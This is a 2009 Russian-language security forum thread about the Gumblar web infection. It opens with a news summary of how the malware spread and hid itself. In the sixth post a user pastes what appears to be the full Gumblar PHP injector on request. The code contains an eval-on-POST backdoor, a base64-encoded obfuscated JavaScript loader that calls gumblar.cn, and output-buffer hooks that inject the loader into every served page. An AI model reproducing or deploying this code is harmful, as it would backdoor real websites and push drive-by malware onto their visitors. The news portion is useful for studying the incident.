ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Мировые новости
Перезагрузить страницу Gumblar – самая распространенная угроза в Сети
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Gumblar – самая распространенная угроза в Сети
  #1  
Старый 19.05.2009, 04:55
RumShun
Постоянный
Регистрация: 27.10.2008
Сообщений: 380
Провел на форуме:
1249808

Репутация: 149
Отправить сообщение для RumShun с помощью ICQ
По умолчанию Gumblar – самая распространенная угроза в Сети
Вирусные аналитики Sophos предупреждают о внезапном всплеске числа зараженных вредоносным скриптом Gumblar веб-страниц, в результате которого эта опасная программа возглавила список самых распространенных сетевых угроз. На долю эксплоита Gumblar (так по имени вредоносного сайта-источника называется Troj/JSRedir-R) приходится 42% от общего числа всех сегодняшних инфекций. Предыдущий лидер, Mal/Iframe-F, со своими семью процентами теперь кажется просто карликом.

По словам Грэхема Клули из Sophos, JSRedir-R обычно обнаруживается на вполне законных веб-сайтах в виде скрытого JavaScript, без ведома пользователя загружающего вредоносный контент со сторонних ресурсов, в первую очередь – с gumblar.cn.

Метод обфускации, используемый Gumblar, крайне прост, и состоит в замене буквенных обозначений их шестнадцатеричными аналогами. Так, вместо "пробела" используется "%20". В конце скрипта имеется функция замены % на произвольный символ.

Вариантов скрипта имеется великое множество, зачастую обнаружить его можно прямо за тегом "body" в скомпрометированном документе HTML. Все файлы подобного рода указывают на внесенный в черный список Google сайт gumblar.cn. Поскольку скрипт обнаруживают на веб-сайтах, использующих самые разные PHP-приложения, отнести его распространение к какой-то одной уязвимости нельзя. Скорее всего, отправной точкой здесь служат скомпрометированные данные авторизации FTP, Например, один из вирусных аналитиков Sophos связывает заражение с PHPMod-A Trojan, который также меняет уровень доступа к директориям веб-серверов и размещает в каталоге "images" файл image.php.

Интересно также, что эксплоит поражает файлы разных типов, а код его при этом неодинаков. Например, в js-файле это будет один код, а в php – другой.
_http://www.xakep.ru/post/48227/default.asp
 
Ответить с цитированием

  #2  
Старый 19.05.2009, 08:31
Antitime
Новичок
Регистрация: 07.05.2009
Сообщений: 1
Провел на форуме:
6490

Репутация: 0
По умолчанию
Опять паника...
 
Ответить с цитированием

  #3  
Старый 19.05.2009, 10:11
zlo12
Постоянный
Регистрация: 28.12.2007
Сообщений: 328
Провел на форуме:
3054717

Репутация: 170
Отправить сообщение для zlo12 с помощью ICQ
По умолчанию
Алярм!! Мы все умрем?...
 
Ответить с цитированием

  #4  
Старый 19.05.2009, 10:50
tux
Постоянный
Регистрация: 26.03.2009
Сообщений: 840
Провел на форуме:
1396963

Репутация: 517


Отправить сообщение для tux с помощью ICQ
По умолчанию
А этот скрипт можно где-нибудь увидеть? Любопытно.
 
Ответить с цитированием

  #5  
Старый 19.05.2009, 11:40
sanya111
Участник форума
Регистрация: 17.05.2009
Сообщений: 160
Провел на форуме:
1724758

Репутация: 222
Отправить сообщение для sanya111 с помощью ICQ
По умолчанию
Да, мне тож интересен этот скрипт. Если можно, то выложи!
 
Ответить с цитированием

  #6  
Старый 19.05.2009, 11:52
shellz[21h]
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122

Репутация: 118
Отправить сообщение для shellz[21h] с помощью ICQ
По умолчанию
злой код Gumblar )
PHP код:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);if(!defined(’TMP_XHGFJOKL’))
define(’TMP_XHGFJOKL’,base64_decode(’PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBFb0xTPSd2YXI8MjBhPDNkPDIyUzw2M3I8NjlwdDw0NW5naTw2ZWU8MjI8MmNiPDNkPDIyVmVyczw2OW88NmUoKSs8MjI8MmNqPDNkPDIyPDIyPDJjPDc1PDNkPDZlYXZpZ2F0b3I8MmV1czw2NTw3MkFnZW50PDNiaWYoKHU8MmVpPDZlPDY0ZXhPZig8MjJXaW48MjIpPDNlMCk8MjY8MjYodTwyZWluZGV4Tzw2NjwyODwyMjw0ZVQ8MjA2PDIyKTwzYzApPDI2PDI2KDw2NG9jdW1lPDZldDwyZWNvbzw2YmllPDJlaTw2ZWRleDw0ZmYoPDIyPDZkaTw2NTw2YjwzZDE8MjIpPDNjMCk8MjY8MjYodDw3OXA8NjVvZih6cjw3Nno8NzRzKTwyMTwzZHR5cGU8NmZmKDwyMjw0MTwyMikpPDI5PDdiPDdhcnZ6dHM8M2Q8MjJBPDIyPDNiZTw3NmFsKDwyMmlmKHc8NjluZG93PDJlPDIyK2ErPDIyKTw2YTwzZDw2YSs8MjI8MmJhKzwyMjw0ZGFqb3I8MjI8MmI8NjI8MmI8NjErPDIyTWlub3I8MjIrYis8NjErPDIyPDQydTw2OWxkPDIyPDJiYjwyYjwyMmo8M2I8MjIpPDNiZG9jPDc1bWVudDwyZXdyaTw3NGU8Mjg8MjI8M2NzPDYzcjw2OXB0PDIwczw3MmM8M2Q8MmY8MmZndTw2ZDw2Mmw8NjFyPDJlY248MmZyczw3MzwyZjwzZmlkPDNkPDIyK2orPDIyPDNlPDNjPDVjPDJmPDczY3JpcHQ8M2U8MjIpPDNiPDdkJzt2YXIgQ2l6PUVvTFMucmVwbGFjZSgvPC9nLCclJyk7ZXZhbCh1bmVzY2FwZShDaXopKX0pKCk7CiAtLT48L3NjcmlwdD4=));
function tmp_lkojfghx($s){ if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all(#<script(.*?)</script>#is’,$s,$a))
foreach($a[0] as $v) if(count(explode(\n”,$v))>5){
$e=preg_match(#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#’,$v) || preg_match(’#[\(\[](\s*\d+,)20,}#’,$v);
if((preg_match(#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos;($v,’[removed]‘)))$s=str_replace($v,”,$s);}
$s1=preg_replace(#<script language=javascript><!– \ndocument\.write\(unescape\(.+?\n –></script>#’,”,$s);
if(stristr($s,<body’)) $s=preg_replace(#(\s*<body)#mi’,TMP_XHGFJOKL.’\1′,$s1);elseif(($s1!=$s)||stristr($s,’</body’)||stristr($s,’</title>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);
for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(’tmp_lkojfghx’);for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}
if(($a=@set_error_handler(’tmp_lkojfghx2&#8242;))!=’tmp_lkojfghx2′)
$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
?>
 
Ответить с цитированием

  #7  
Старый 19.05.2009, 11:59
cupper
Постоянный
Регистрация: 06.06.2007
Сообщений: 575
Провел на форуме:
1180737

Репутация: 180


По умолчанию
написано как оно работает
http://shlak.blogspot.com/ в первой статье
 
Ответить с цитированием

  #8  
Старый 19.05.2009, 12:17
zeppe1in
Постоянный
Регистрация: 12.07.2006
Сообщений: 327
Провел на форуме:
1654818

Репутация: 117
По умолчанию
Цитата:
Сообщение от RumShun  
Интересно также, что эксплоит поражает файлы разных типов, а код его при этом неодинаков. Например, в js-файле это будет один код, а в php – другой.
вот так чудеса)
 
Ответить с цитированием

  #9  
Старый 19.05.2009, 23:46
LiteMentaL
Участник форума
Регистрация: 24.02.2008
Сообщений: 253
Провел на форуме:
1586992

Репутация: 892
Отправить сообщение для LiteMentaL с помощью ICQ
По умолчанию
шелз отжогг имхо у мну сайт умрёт.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ошибки Windows 2 SVipeR Windows 9 02.03.2009 19:28
Социальные сети за два года выросли вдвое [dei] Мировые новости 5 17.01.2009 13:05
Ошибки Windows dinar_007 Windows 19 01.07.2007 13:32



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ